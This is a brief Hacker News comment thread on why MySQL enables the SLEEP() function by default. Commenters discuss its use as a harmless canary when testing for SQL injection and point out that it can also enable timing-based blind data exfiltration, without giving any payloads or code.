Hacker News new | past | comments | ask | show | jobs | submit login

why do vanilla MySQL packages come with SLEEP() even enabled? Why not make it an option?

Because it's a good "canary" for SQL injection: it doesn't do any real damage, but it's noticeable enough to tell you that you have a possibly vulnerable condition.




> it doesn't do any real damage

I'm not sure about that. You can perform blind exfiltration of row data by using SLEEP. Handy in situations where you can run a query but can't get it reflected in the server's output.


This is a valuable point: you can absolutely exfiltrate data this way based on timing, and it's fairly automated with tools at this point.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: